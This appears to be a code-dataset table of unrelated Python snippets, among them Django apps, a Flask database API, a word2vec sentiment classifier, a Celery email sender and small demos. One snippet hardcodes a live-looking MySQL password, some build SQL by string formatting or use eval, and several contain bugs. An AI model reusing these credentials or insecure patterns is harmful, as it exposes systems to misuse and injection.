index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
24,600 | 0379e5b0c26c0a72378db9fdcf4f8855261b0214 | from .resources import SearchResource
def includeme(config):
''' Pyramid includeme '''
config.include('amnesia.modules.search.views')
|
24,601 | a9d351b1611d7af86e1d035c28017367730e374b | import logging
import factory
from sqlalchemy.exc import InvalidRequestError
from haven.lib.database import db
logging.getLogger('factory').setLevel(logging.ERROR)
class BaseFactory(factory.alchemy.SQLAlchemyModelFactory):
"""Base Factory."""
class Meta:
abstract = True
sqlalchemy_session = db.session
@classmethod
def _build(cls, model_class, *args, **kwargs):
"""Returns a dictionary of a built object."""
for k in kwargs.keys():
if k in model_class.relationships():
rel_key = '{}_id'.format(k)
try:
kwargs[rel_key] = str(kwargs[k].id)
except AttributeError:
pass
obj = super(BaseFactory, cls)._build(model_class, *args, **kwargs)
obj_dict = obj.to_dict()
try:
db.session.expunge(obj)
except InvalidRequestError:
pass
return obj_dict
@classmethod
def _create(cls, model_class, *args, **kwargs):
"""Overrides create strategy, commits on create"""
for k in kwargs.keys():
if k in model_class.relationships():
rel_key = '{}_id'.format(k)
kwargs[rel_key] = str(kwargs[k].id)
obj = super(BaseFactory, cls)._create(model_class, *args, **kwargs)
obj.save(obj)
return obj
|
24,602 | 898cd6cff6edb6e7e4cefd317fb231fd5a07a8f6 | #!/usr/bin/python
#-*-coding:utf-8-*-
#这段代码目的是创建一个可以改变大小的图形窗口
import pygame
from pygame.locals import *
from sys import exit
pygame.init()
#定义素材的位置
background_image_filename = "/home/yg/Pictures/1.jpg"
background = pygame.image.load(background_image_filename).convert()
#定义窗口的大小
windows_size = background.get_size()
screen = pygame.display.set_mode(windows_size,RESIZABLE,32)
#RESIEABLE代表窗口大小可以调节
while True:
#收集事件
event = pygame.event.wait()
if event.type == QUIT:
exit()
if event.type == VIDEORESIZE:
vindows_size = event.size
screen=pygame.display.set_mode(windows_size,RESIZABLE,32)
pygame.display.set_caption("Window resize to " + str(event.size))
screen_width,screen_height = windows_size
for y in range(0,screen_height,background.get_height()):
for x in range(0,screen_width,background.get_width()):
screen.blit(background,(x,y))
pygame.display.update()
|
24,603 | b5ccc92e93e84375aef1443eddc3e8cf59bef31a | from django.db import models
import random
import string
class Timetable(models.Model):
timetable = models.FileField(upload_to='timetables/')
timetable_id = models.CharField(max_length=50)
uploaded_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return str(self.timetable_id)
class Year(models.Model):
year = models.IntegerField()
def __str__(self):
return str(self.year)
class Semester(models.Model):
year = models.ForeignKey(Year, on_delete=models.CASCADE, related_name='semesters')
sem = models.IntegerField()
def __str__(self):
return str(self.sem)
class Exam(models.Model):
semester = models.ForeignKey(Semester, on_delete=models.CASCADE, related_name='exams')
timetable_id = models.CharField(max_length=50)
exam_no = models.IntegerField()
unit_name = models.CharField(max_length=100)
invigilator = models.CharField(max_length=100)
venue = models.CharField(max_length=100)
date = models.CharField(max_length=100)
time = models.CharField(max_length=100)
def __str__(self):
return self.unit_name
|
24,604 | b0dab165670fd909b4813857fcbb6ccb6bbf7a05 | from gensim.models import Word2Vec as w2v
from sklearn import svm
import nltk
import pandas
import numpy as np
from sklearn import svm
import csv
import re
import pickle
class File_Tools():
@staticmethod
def get_tsv_col(file_name : str, *cols) -> dict:
result = {}
with open(file_name) as f:
rd = csv.reader(f, delimiter="\t", quotechar='"')
title_row = next(rd)
rows = {}
for col in cols:
if col not in title_row:
Exception("Invalid column name")
else:
rows[title_row.index(col)] = col
result = {row : [] for row in rows.values()}
for row in rd:
for val in rows.keys():
result[rows[val]].append(row[val])
return result
@staticmethod
def get_all_lines(file_name : str):
res = []
with open(file_name, "r", encoding="utf-8") as f:
for line in f.read().split("\n"):
res.append(line)
return res
@staticmethod
def save_list_to_file(file_name : str, ls : list):
with open(file_name, "w+", encoding="utf-8") as f:
for phrase in ls:
f.writelines(phrase + "\n")
class Text_Preprocessing():
@staticmethod
def clean_phrases(phrases : list):
res = []
for phrase in phrases:
phrase = phrase.lower().strip()
phrase = re.sub(r'[^a-z0-9\s]', '', phrase)
res.append(re.sub(r'\s{2,}', ' ', phrase))
return res
# @staticmethod
# async def clean_phrases(phrases : list):
# res = []
# executor = concurrent.futures.ProcessPoolExecutor(10)
# res = [executor.submit(Text_Preprocessing.__clean_phrases__, phrase_group) for phrase_group in grouper(10000, phrases)]
# concurrent.futures.wait(res)
# return res
# @staticmethod
# def tokenize(phrase):
# return [token for token in phrase.split() if token not in STOP_WORDS]
class Word_To_Vec_Tools(object):
def __init__(self) -> None:
super().__init__()
def make_corpus(self, input_file : str, col_name : str):
if not col_name:
self.__make_corpus__(input_file)
return
csv = pandas.read_csv(input_file)
df = pandas.DataFrame(csv)
sentences = df[col_name].values
self.word_vec = [nltk.word_tokenize(sentence) for sentence in sentences]
def __make_corpus__(self, input_file : str):
sentences = File_Tools.get_all_lines(input_file)
self.word_vec = [nltk.word_tokenize(sentence) for sentence in sentences]
def load_model(self, model_name : str):
self.model = w2v.load(model_name)
def save_model(self, model_name : str):
if not self.model:
Exception("No model to save")
self.model.save(model_name)
def train_model(self, sg = 1, size = 300, window = 10, min_count = 2, workers = 4) -> None:
if not self.word_vec:
Exception("Must make word vec")
self.model = w2v(self.word_vec, vector_size=size, window=window, epochs=10, sg=sg, min_count=min_count,workers=workers)
#self.model.save("recent_model.model")
def get_similar_words(self, word : str, num_words = 10) -> list:
if not self.model:
Exception("Must create model first")
return self.model.most_simlar(word, size = num_words)
# def compare_words(self, word1 : str, word2 : str):
# try:
# np.linalg.norm(self.model.wv[word1], self.model.wv[word2])
# except:
# print("words not present in w2v model")
def get_average_of_sentence(self, phrase) -> list:
words = nltk.word_tokenize(phrase)
total = []
if len(words) == 0:
print(phrase)
return -1
for word in words:
if word in self.model.wv:
total.append(self.model.wv[word])
return total
def get_average_of_sentences(self, phrases) -> list:
res = []
for phrase in phrases:
tmp = self.get_average_of_sentence(phrase)
if type(tmp) != type([]):
continue
else:
res.append(tmp)
return res
def get_similar(self, positive : list, negative : list):
if not self.model:
Exception("Must create model first")
return self.model.wv.most_similar(positive = positive, negative = negative)
class Classifier():
def __init__(self) -> None:
pass
def train_svm_classifier(self, phrases, categories) -> None:
self.classifier = svm.SVC(kernel="poly", degree=6)
self.classifier.fit(phrases, categories)
def save_classifier(self, classifier_name) -> None:
with open(classifier_name, 'wb') as f:
pickle.dump(self.classifier, f, protocol=pickle.HIGHEST_PROTOCOL)
def load_classifier(self, file_name) -> None:
with open(file_name, 'rb') as f:
self.classifier = pickle.load(f)
def test_single_phrase_vector(self, phrase_vec):
return self.classifier.predict([phrase_vec])
def test_many_phrase_vectors(self, phrase_vecs):
return self.classifier.predict(phrase_vecs)
def test_results(self, phrase_vecs, res):
return self.classifier.score(phrase_vecs, res)
# def check_category(self, categories : list, phrase : str):
# sentence_score = self.get_average_of_sentence(phrase)
# max_similarity = 0
# res = None
# for category in categories:
# cos_similarity = np.dot(sentence_score, self.model.wv[category])/(np.linalg.norm(sentence_score) * np.linalg.norm(self.model.wv[category]))
# if cos_similarity > max_similarity:
# max_similarity = cos_similarity
# res = category
# return res
def main():
# w2vt = Word_To_Vec_Tools()
# t = File_Tools.get_tsv_col("train.tsv", "Phrase")
# File_Tools.save_list_to_file("Movie_Phrases.txt", t["Phrase"])
# w2vt.make_corpus("Movie_Phrases.txt", None)
# w2vt.train_model()
# w2vt.save_model("movie_model.model")
# sent = File_Tools.get_tsv_col("train.tsv", "Sentiment", "Phrase")
# sent_avg = w2vt.get_average_of_sentences(sent["Phrase"])
# k_v_pairs = []
# for i in range(len(sent_avg)):
# try:
# #
# k_v_pairs.append((sent_avg[i][0], sent["Sentiment"][i]))
# except:
# pass
# c = Classifier()
# c.train_svm_classifier([i[0] for i in k_v_pairs], [j[1] for j in k_v_pairs])
# c.save_classifier('svm_model.pickle')
test_info = File_Tools.get_tsv_col("test.tsv", "Phrase", "PhraseId")
w2vt = Word_To_Vec_Tools()
w2vt.load_model("movie_model.model")
sent_avg = w2vt.get_average_of_sentences(test_info["Phrase"])
res = {}
c = Classifier()
c.load_classifier("svm_model.pickle")
i = 0
ls = []
for i, p in enumerate(sent_avg):
try:
res[test_info["PhraseId"][i]] = c.test_single_phrase_vector(p[0])[0]
except Exception as e:
res[test_info["PhraseId"][i]] = 0
i += 1
if i % 1000 == 0:
print(i)
#Word_To_Vec_Tools.make_corpus()
# print(tmp)
with open ("Results.csv", "w", newline='') as f:
w = csv.writer(f)
w.writerow(["PhraseId", "Sentiment"])
for k in res.keys():
w.writerow([k, res[k]])
if __name__ == '__main__':
main()
|
24,605 | d3be652f3570b2f362af211e12614ce161f02032 | __author__ = 'TOANTV'
from rest_framework.permissions import BasePermission
SAFE_METHODS = ('GET', 'HEAD', 'OPTIONS')
class IsOneUserAuthenticated(BasePermission):
def has_permission(self, request, view):
return request.user and request.user.is_authenticated()
class IsOneSuperAdmin(BasePermission):
def has_permission(self, request, view):
return request.user and request.user.is_superuser
class IsOneUserAdmin(BasePermission):
def has_permission(self, request, view):
if request.user and request.user.is_authenticated():
return request.user.is_smod==1 or request.user.is_superuser
return False
class IsOneUserScanner(BasePermission):
def has_permission(self, request, view):
if request.user and request.user.is_authenticated():
return request.user.is_smod == 2 or request.user.is_superuser
return False
# class IsOneSuperAdminOrIsSelf(BasePermission):
# def has_object_permission(self, request, view, obj):
# return obj == request.user or request.user.is_superuser
class IsOneUserAuthenticatedReadOnlyOrScanner(BasePermission):
def has_permission(self, request, view):
if request.method in SAFE_METHODS:
return request.user and request.user.is_authenticated()
elif request.user and request.user.is_authenticated():
return request.user.is_smod >= 1 or request.user.is_superuser
return False
class IsOneUserAuthenticatedReadOnly(BasePermission):
def has_permission(self, request, view):
return (
request.method in SAFE_METHODS and
request.user and
request.user.is_authenticated()
)
class AllowAnyReadOnly(BasePermission):
def has_permission(self, request, view):
return (
request.method in SAFE_METHODS or
request.user and
request.user.is_authenticated
)
class IsOneUserReadOnlyOrSuperAdmin(BasePermission):
def has_permission(self, request, view):
if request.method in SAFE_METHODS:
return request.user and request.user.is_authenticated()
else:
return request.user and request.user.is_superuser
class IsOneUserReadOnlyOrScanner(BasePermission):
def has_permission(self, request, view):
if request.method in SAFE_METHODS:
return request.user and request.user.is_authenticated()
else:
return request.user.is_smod == 2 or request.user.is_superuser
class IsOneUserAuthenticatedReadOnlyOrAdmin(BasePermission):
def has_permission(self, request, view):
if request.method in SAFE_METHODS:
return request.user and request.user.is_authenticated()
else:
return request.user.is_smod == 1 or request.user.is_superuser
class IsAnyOneReadOnly(BasePermission):
def has_permission(self, request, view):
if request.method in SAFE_METHODS:
return True
else:
return False |
24,606 | ff3932d34fda83fd381d52bb368c4c2a8c8c91ca | #!/usr/bin/python
# -*- coding: <encoding name> -*-
from pymongo import MongoClient
def Connection(host='127.0.0.1',port=27017, database=None):
conn = MongoClient(host=host,port=port)
mongo = eval('conn.' + database)
return mongo
if __name__ == "__main__":
db = Connection(host='192.168.3.100', database='xxx')
print(db.test.insert_one({'a': 1}))
print(db.test.find_one) |
24,607 | 75d947afef7bfde1777f19d67311c7b958ab89aa | from django.shortcuts import render,redirect
from django.template import RequestContext
from django.contrib.auth import authenticate,login,get_user_model
from .forms import PolicyForm,InsuranceForm
# Create your views here.
def insurance(request):
insurance_form=InsuranceForm(request.POST or None)
context={
"insurance_form":insurance_form
}
if insurance_form.is_valid():
print(insurance_form.cleaned_data)
context['insurance_form']=InsuranceForm()
insurance_form.save()
return redirect("/#policy")
return render(request,'insurance/insurance.html',context)
def policy(request):
policy_form=PolicyForm(request.POST or None)
context={
"policy_form":policy_form
}
print("hai")
if policy_form.is_valid():
print("hai1")
print(policy_form.cleaned_data)
context['policy_form']=PolicyForm()
return redirect("insurance")
return render(request,'policy/policy_register.html',context) |
24,608 | 5206c2bc21c9b9ca98d1bf9140386a5babc88e42 | # in order for this to run, you need to
# * install python and include python and python/Scripts folder in windows environment variable PATH
# * install flask package with pip install flask
# * run the command python server.py
import random
from flask import Flask, render_template
from flask import request, jsonify
from bson.json_util import dumps
from urllib.parse import parse_qs
from pymongo import MongoClient
import time
import sqlite3
import pandas
from sqlalchemy import create_engine
# import json
# import ast
# import imp
# from config import client
# from app import app
# this example is based on
# https://codeburst.io/creating-a-full-stack-web-application-with-python-npm-webpack-and-react-8925800503d9
app = Flask(__name__, static_folder='../client/dist', template_folder='../client/src/templates')
@app.route('/')
def index():
return render_template('index.html')
@app.route('/hello')
def hello():
return get_hello()
@app.route("/data", methods=['GET'])
def data():
return get_data_from_mongodb()
@app.route("/dataSqLite", methods=['GET'])
def data_sqlite():
return get_data_from_sqlite()
@app.route("/dataMySql", methods=['GET'])
def data_mysql():
return get_data_from_mysql()
def get_hello():
greeting_list = ['Ciao', 'Hei', 'Salut', 'Hola', 'Hallo', 'Hej']
return random.choice(greeting_list)
def get_data_from_mongodb():
# this example is based on
# https://www.moesif.com/blog/technical/restful/Guide-to-Creating-RESTful-APIs-using-Python-Flask-and-MongoDB/
# DATABASE = MongoClient()['restfulapi'] # DB_NAME
mongo_client = MongoClient('localhost', 27017)
database = mongo_client.visualization;
collection = database.german_data;
try:
# Call the function to get the query params
query_params = parse_query_params(request.query_string)
# Check if dictionary is not empty
if query_params:
# Try to convert the value to int
query = {k: int(v) if isinstance(v, str) and v.isdigit() else v for k, v in query_params.items()}
# Fetch all the record(s)
records_fetched = collection.find(query)
# Check if the records are found
if records_fetched.count() > 0:
# Prepare the response
return dumps(records_fetched)
else:
# No records are found
return "", 404
# If dictionary is empty
else:
current_milli_time = lambda: int(round(time.time() * 1000))
start_time = current_milli_time()
limit = 10000
document_cursor = collection.find().limit(limit)
time_after_query = current_milli_time()
print('Time for query: ' + str(time_after_query - start_time) + ' ms')
# Return all the records as query string parameters are not available
count = document_cursor.count()
print('Number of records: ' + str(count))
if count > 0:
documents = jsonify(list(document_cursor))
time_after_conversion = current_milli_time()
print('Time for conversion: ' + str(time_after_conversion - time_after_query) + ' ms')
return documents
else:
return jsonify([])
except Exception as exception:
print(exception)
return "", 500
def get_data_from_sqlite():
try:
# Call the function to get the query params
query_params = parse_query_params(request.query_string)
# Check if dictionary is not empty
if query_params:
#todo
foo=1
else:
# Return all the records as query string parameters are not available
current_milli_time = lambda: int(round(time.time() * 1000))
start_time = current_milli_time()
with sqlite3.connect('./german_data.sqlite') as connection:
query = "SELECT * FROM `german_data`"
data_frame = pandas.read_sql_query(query, connection)
time_after_query = current_milli_time()
print('Time for query: ' + str(time_after_query - start_time) + ' ms')
count = data_frame.shape[0]
print('Number of records: ' + str(count))
if count > 0:
documents = data_frame.to_json(orient='records')
time_after_conversion = current_milli_time()
print('Time for conversion: ' + str(time_after_conversion - time_after_query) + ' ms')
return documents
else:
# Return empty array if no users are found
return jsonify([])
except Exception as exception:
print(exception);
# Error while trying to fetch the resource
# Add message for debugging purpose
return "", 500
def get_data_from_mysql():
try:
# Call the function to get the query params
query_params = parse_query_params(request.query_string)
# Check if dictionary is not empty
if query_params:
#todo
foo=1
else:
# Return all the records as query string parameters are not available
host = 'dagobah'
port = 3366
database = 'visualization'
username = 'root'
password = '*******' #you need to use right password for this to work
engine = create_engine(f"mysql://{username}:{password}@{host}:{port}/{database}")
current_milli_time = lambda: int(round(time.time() * 1000))
start_time = current_milli_time()
with engine.connect() as connection:
query = "SELECT * FROM `german_data`" + " LIMIT 100000"
data_frame = pandas.read_sql_query(query, connection)
time_after_query = current_milli_time()
print('Time for query: ' + str(time_after_query - start_time) + ' ms')
count = data_frame.shape[0]
print('Number of records: ' + str(count))
if count > 0:
documents = data_frame.to_json(orient='records')
time_after_conversion = current_milli_time()
print('Time for conversion: ' + str(time_after_conversion - time_after_query) + ' ms')
return documents
else:
# Return empty array if no users are found
return jsonify([])
except Exception as exception:
print(exception);
# Error while trying to fetch the resource
# Add message for debugging purpose
return "", 500
def parse_query_params(query_string):
query_params = dict(parse_qs(query_string.decode()))
query_params = {k: v[0] for k, v in query_params.items()}
return query_params
if __name__ == '__main__':
app.run()
|
24,609 | d9d125a3f9e835543f13e8b91d29bee024fe24d2 | s=0
cont=0
for c in range(0, 501, 3):
if (c%2)==1:
s += c
cont = cont+1
print('a soma dos numeros impares e multiplos de 3 entre 1 e 500 e {}'.format(s))
print('foram contados {} numeros'.format(cont)) |
24,610 | 82a0675d518a666aec36e8a5d18727fa68b2a2e4 | import pygame
from network import Network
from player import Player
width = 500
height = 500
win = pygame.display.set_mode((width, height))
pygame.display.set_caption("Client")
def redraw_window(win, player, player2):
win.fill('white')
player.draw(win)
player2.draw(win)
pygame.display.update()
def main():
run = True
n = Network()
player = n.get_p()
clock = pygame.time.Clock()
while run:
clock.tick(60)
player2 = n.send(player)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
pygame.QUIT()
player.move()
redraw_window(win, player, player2)
main() |
24,611 | 6030d77ac0e6a6b4efd05e73f1321d7c001c912d | # @class_declaration interna #
# import datetime
from celery.task import periodic_task
from celery.schedules import crontab
from YBUTILS import notifications
from YBLEGACY import qsatype
from YBLEGACY.constantes import *
from models.flsyncppal import flsyncppal_def as syncppal
class interna(qsatype.objetoBase):
ctx = qsatype.Object()
def __init__(self, context=None):
self.ctx = context
# @class_declaration sanhigia_sync #
class sanhigia_sync(interna):
@periodic_task(run_every=crontab(minute="*/30", hour="*"))
def sanhigia_sync_enviocorreo():
q = qsatype.FLSqlQuery()
q.setSelect("a.idalbaran,a.agenciaenvio,a.sh_numtracking,a.codigo,c.nombre,c.email")
q.setFrom("albaranescli a LEFT OUTER JOIN clientes c ON a.codcliente = c.codcliente")
where = "a.sh_numtracking is not null AND a.sh_estadosegui = 'Pendiente' ORDER BY a.fecha LIMIT 20"
# if where != "":
# where += " AND "
q.setWhere(where)
q.exec_()
if not q.size():
# syncppal.iface.log("Exito", "No hay datos para enviar")
return True
oDM = qsatype.Object()
qDM = qsatype.FLSqlQuery()
qDM.setSelect("sh_hostcorreosaliente, sh_puertosmtp, sh_tipocxsmtp, sh_tipoautsmtp, sh_usuariosmtp, sh_passwordsmtp")
qDM.setFrom(u"factppal_general")
qDM.setWhere(u"1 = 1")
if not qDM.exec_():
# syncppal.iface.log("Error", "No estan informados los datos del correo saliente.")
return False
if qDM.first():
oDM["hostcorreosaliente"] = qDM.value("sh_hostcorreosaliente")
oDM["puertosmtp"] = qDM.value("sh_puertosmtp")
oDM["tipocxsmtp"] = qDM.value("sh_tipocxsmtp")
oDM["tipoautsmtp"] = qDM.value("sh_tipoautsmtp")
oDM["usuariosmtp"] = qDM.value("sh_usuariosmtp")
oDM["passwordsmtp"] = qDM.value("sh_passwordsmtp")
while q.next():
idalbaran = q.value("a.idalbaran")
agencia = q.value("a.agenciaenvio")
codigo = q.value("a.codigo")
numtracking = q.value("a.sh_numtracking")
nombre = q.value("c.nombre")
email = qsatype.FLUtil.quickSqlSelect("albaranescli a INNER JOIN lineasalbaranescli la ON a.idalbaran = la.idalbaran INNER JOIN pedidoscli p ON la.idpedido = p.idpedido", "p.mg_email", "a.idalbaran = {} AND p.mg_increment_id is not null".format(idalbaran))
if not email or email == "":
email = q.value("c.email")
estado = "Pendiente"
asunto = "Seguimiento del pedido {}".format(codigo)
cuerpo = ""
if not email or email == "":
# syncppal.iface.log("Error. El cliente {} con pedido {} no tiene email.".format(item["nombre"], item["codigo"]), "enviocorreo")
estado = "Sin correo"
else:
connection = notifications.get_connection(oDM["hostcorreosaliente"], oDM["usuariosmtp"], oDM["passwordsmtp"], oDM["puertosmtp"], oDM["tipocxsmtp"])
urlsegui = qsatype.FLUtil.quickSqlSelect("agenciastrans", "urlsegui", "codagencia = '{}'".format(agencia))
if urlsegui is None or urlsegui == "":
# syncppal.iface.log("Error. No tiene informado el campo 'URL de seguimiento en la tabla {}".format(agencia), "enviocorreo")
continue
cuerpo += '<style type="text/css">@import url(http://fonts.googleapis.com/css?family=Raleway:400,500,700);@media screen {.email-heading h1,.store-info h4, th.cell-name,a.product-name,p.product-name,.address-details h6,.method-info h6,h5.closing-text,.action-button,.action-button a,.action-button span, .action-content h1 {font-family: "Raleway", Verdana, Arial !important;font-weight: normal;}}@media screen and (max-width: 600px) {body {width: 94% !important;padding: 0 3% !important;display: block !important;}.container-table {width: 100% !important;max-width: 600px;min-width: 300px;} td.store-info h4 {margin-top: 8px !important;margin-bottom: 0px !important;}td.store-info p {margin: 5px 0 !important;}.wrapper {width: 100% !important; display: block;padding: 5px 0 !important;}.cell-name,.cell-content {padding: 8px !important;}}@media screen and (max-width: 450px) {.email-heading, .store-info {float: left;width: 98% !important;display: block;text-align: center;padding: 10px 1% !important;border-right: 0px !important;} .address-details, .method-info {width: 85%;display: block;}.store-info {border-top: 1px dashed #c3ced4;}.method-info {margin-bottom: 15px !important;}}/* Remove link color on iOS */.no-link a {color: #333333 !important;cursor: default !important;text-decoration: none !important;}.method-info h6,.address-details h6,.closing-text {color: #3696c2 !important;}td.order-details h3,td.store-info h4 {color: #333333 !important;}.method-info p,.method-info dl {margin: 5px 0 !important;font-size: 12px !important;}td.align-center {text-align: center !important;}td.align-right {text-align: right !important;}/* Newsletter styles */td.expander {padding: 0 !important;}table.button td,table.social-button td {width: 92% !important;}table.facebook:hover td {background: #2d4473 !important;}table.twitter:hover td {background: #0087bb !important;}table.google-plus:hover td { background: #CC0000 !important;}@media screen and (max-width: 600px) {.products-grid tr td {width: 50% !important;display: block !important;float: left !important;}}.product-name a:hover {color: #3399cc !important;text-decoration: none !important;}</style><!-- Begin wrapper table --><table width="100%" cellpadding="0" cellspacing="0" border="0" id="background-table" style="mso-table-lspace: 0pt; mso-table-rspace: 0pt; border-collapse: collapse; padding: 0; margin: 0 auto; background-color: #ebebeb; font-size: 12px;"><tr><td valign="top" class="container-td" align="center" style="font-family: Verdana, Arial; font-weight: normal; border-collapse: collapse; vertical-align: top; padding: 0; margin: 0; width: 100%;"><table cellpadding="0" cellspacing="0" border="0" align="center" class="container-table" style="mso-table-lspace: 0pt; mso-table-rspace: 0pt; border-collapse: collapse; padding: 0; margin: 0 auto; width: 600px;"><tr><td style="font-family: Verdana, Arial; font-weight: normal; border-collapse: collapse; vertical-align: top; padding: 0; margin: 0;"><table cellpadding="0" cellspacing="0" border="0" class="logo-container" style="mso-table-lspace: 0pt; mso-table-rspace: 0pt; border-collapse: collapse; padding: 0; margin: 0; width: 100%;"><tr><td class="logo" style="font-family: Verdana, Arial; font-weight: normal; border-collapse: collapse; vertical-align: top; padding: 15px 0px 10px 5px; margin: 0;"><a href="http://store.sanhigia.com/es/%22%22/index/index/" style="color: #c52213; float: left; display: block;"><img width="165" style="-ms-interpolation-mode: bicubic; outline: none; text-decoration: none;"></a></td></tr></table></td></tr><tr><td valign="top" class="top-content" style="font-family: Verdana, Arial; font-weight: normal; border-collapse: collapse; vertical-align: top; padding: 5px; margin: 0; border: 1px solid #ebebeb; background: #FFF;"><!-- Begin Content --><div class="header"><img src="http://store.sanhigia.com/skin/frontend/accessshop/default/images/sanhigia_logo.jpg" style="max-width: 300px; margin: 0 auto; display: block; -ms-interpolation-mode: bicubic;"/></div><table cellpadding="0" cellspacing="0" border="0" style="margin-top: 30px; mso-table-lspace: 0pt; mso-table-rspace: 0pt; border-collapse: collapse; padding: 0; margin: 0; width: 100%;"><tr><td class="action-content" style="font-family: Verdana, Arial; font-weight: normal; border-collapse: collapse; vertical-align: top; padding: 10px 20px 15px; margin: 0; line-height: 18px;"><h4 style="font-family: Verdana, Arial; font-weight: normal;">'
urlsegui = urlsegui.replace("#TN#", numtracking)
cuerpo2 = '<h4>ACTUALIZACIÓN DE TU PEDIDO</h4><p>Tu pedido con albarán {0} ha sido enviado.<br>El número del seguimiento del pedido es {1}.</p>Puedes comprobar el estado del envío <a href="{2}" target="_blank">pulsar aqui</a><br><br>Gracias, Sanhigía'.format(codigo, numtracking, urlsegui)
cuerpo += cuerpo2
cuerpo += '</h4></td></tr></table></td></tr></table></td></tr></table>'
# Comprobar la sync de envios
email = "{}".format(email)
emails = email.split(",")
if connection is False:
# syncppal.iface.log("Error. Los datos de conexión han fallado", "enviocorreo")
estado = "Error"
elif notifications.sendMail(connection, oDM.usuariosmtp, asunto, cuerpo, emails) is False:
# syncppal.iface.log("Error. Ocurrió un error durante el proceso de enviar correos de segumiento de envio", "enviocorreo")
estado = "Error"
else:
# syncppal.iface.log("Exito. Se ha enviado email con número el seguimiento al cliente {}".format(item["nombre"]), "enviocorreo")
estado = "Enviado"
qsatype.FLSqlQuery().execSql("UPDATE albaranescli SET sh_estadosegui = '{}' WHERE idalbaran = '{}'".format(estado, idalbaran))
return True
def __init__(self, context=None):
super(sanhigia_sync, self).__init__(context)
# @class_declaration head #
class head(sanhigia_sync):
def __init__(self, context=None):
super(head, self).__init__(context)
# @class_declaration ifaceCtx #
class ifaceCtx(head):
def __init__(self, context=None):
super(ifaceCtx, self).__init__(context)
# @class_declaration FormInternalObj #
class FormInternalObj(qsatype.FormDBWidget):
def _class_init(self):
self.iface = ifaceCtx(self)
form = FormInternalObj()
form._class_init()
form.iface.ctx = form.iface
form.iface.iface = form.iface
iface = form.iface
|
24,612 | 8a504c72170f750fd962977234af684cd6277bbd | def string_to_array(string):
return string.split(" ")
#tests
Test.describe("Basic tests")
Test.assert_equals(string_to_array("Robin Singh"), ["Robin", "Singh"])
Test.assert_equals(string_to_array("CodeWars"), ["CodeWars"])
Test.assert_equals(string_to_array("I love arrays they are my favorite"), ["I", "love", "arrays", "they", "are", "my", "favorite"])
Test.assert_equals(string_to_array("1 2 3"), ["1", "2", "3"])
Test.assert_equals(string_to_array(""), [""])
Test.describe("Random tests")
from random import randint
sol=lambda s: s.split(" ")
base="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
for _ in range(40):
s=" ".join(["".join([base[randint(0,len(base)-1)] for q in range(randint(1,20))]) for k in range(randint(1,15))])
Test.it("Testing for "+repr(s))
Test.assert_equals(string_to_array(s),sol(s),"It should work for random inputs too")
|
24,613 | 01fcec60c7e8aa9f00e9cba3294f7d1eaf0abb01 | from nested_admin import urls as nested_admin_urls
from django.conf import settings
from django.conf.urls import include, url
from django.urls import path
from django.views.generic.base import RedirectView
from django.conf.urls.static import static
from django.contrib.admin.views.decorators import staff_member_required
from django.views.decorators.cache import never_cache
from democracy import urls_v1
from democracy.views.upload import browse, upload
from helusers.admin_site import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'', include('helusers.urls')),
url('', include('social_django.urls', namespace='social')),
url(r'^v1/', include(urls_v1)),
url(r'^nested_admin/', include(nested_admin_urls)),
url(r'^ckeditor/', include('ckeditor_uploader.urls')),
url(r'^upload/', staff_member_required(upload), name='ckeditor_upload'),
url(r'^browse/', never_cache(staff_member_required(browse)), name='ckeditor_browse'),
path('', RedirectView.as_view(url='v1/'))
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
24,614 | 854ca27801708bd74b7775d40a0ec6e4f60a5112 | import mysql.connector
from mysql.connector import Error
from configparser import ConfigParser
import numpy as np
# http://www.mysqltutorial.org/python-mysql-query/
db = 'log'
conn = mysql.connector.connect(host='10.6.66.160', database=db, user='debian-sys-maint', password = 'SoLcxvfgbzqU0ixI')
# curser = area where all the records are stored
dbcursor = conn.cursor()
# dbcursor.execute('SHOW TABLES')
# print(dbcursor.fetchall())
table = 'SELECT * FROM cfvdata'
dbcursor.execute(table)
table_name = [i[0] for i in dbcursor.description]
print(table_name)
BMS = dbcursor.fetchall()
BMSnp = np.array(BMS)
print(np.shape(BMSnp))
|
24,615 | c309bf668b04ecc3ad4b773b28a80aefb845d193 | """
Fraction to Recurring Decimal
Given two integers representing the numerator and denominator of a fraction, return the fraction in string format.
If the fractional part is repeating, enclose the repeating part in parentheses.
If multiple answers are possible, return any of them.
It is guaranteed that the length of the answer string is less than 104 for all the given inputs.
Input: numerator = 1, denominator = 2
Output: "0.5"
Example 2:
Input: numerator = 2, denominator = 1
Output: "2"
Example 3:
Input: numerator = 2, denominator = 3
Output: "0.(6)"
Example 4:
Input: numerator = 4, denominator = 333
Output: "0.(012)"
Example 5:
Input: numerator = 1, denominator = 5
Output: "0.2"
Constraints:
-231 <= numerator, denominator <= 231 - 1
denominator != 0
"""
class Solution:
def fractionToDecimal(self, numerator: int, denominator: int) -> str:
import pdb; pdb.set_trace()
sign = '+'
if (numerator < 0 and denominator > 0) or (numerator > 0 and denominator < 0):
sign = '-'
numerator, denominator = abs(numerator), abs(denominator)
res, rem = divmod(numerator, denominator)
res = str(res) if sign == '+' else f'-{res}'
if not rem:
return res
res += '.'
d = {}
while rem:
if rem in d:
res = f"{res[:d[rem]]}({res[d[rem]:]})"
break
d[rem] = len(res)
rem *= 10
res += str(rem // denominator)
rem %= denominator
return res
numerator = 1
denominator = 2
print(Solution().fractionToDecimal(numerator, denominator))
numerator = 4
denominator = 333
print(Solution().fractionToDecimal(numerator, denominator)) |
24,616 | 590de78f7168f3932d11b83df5776a43a0654317 | class node:
def __init__(self,item):
self.data = item
self.next = 'null'
def setData(item):
self.data = item
def setNext(item):
self.next = item
def getData():
return self.data
class queue:
def __init__(self,item):
self.head = node(item)
self.head.setNext('null')
self.tail = node(item)
self.tail.setnext('null')
def pop(self):
value = self.head.getData()
self.head = self.next
return value
def push(self,newItem):
newNode = node(newItem)
self.next = newNode
self.tail = self.next
|
24,617 | ed98f1e4679286f2fc79488df96143eab9f104f0 | #!/usr/bin/env python
# find reads matching target genes using BLAST
from pyphylogenomics import BLAST;
query_seqs = "data/modified/wrk_ionfile.fasta";
genome = "data/genes_Bmori.fasta";
BLAST.blastn(query_seqs, genome);
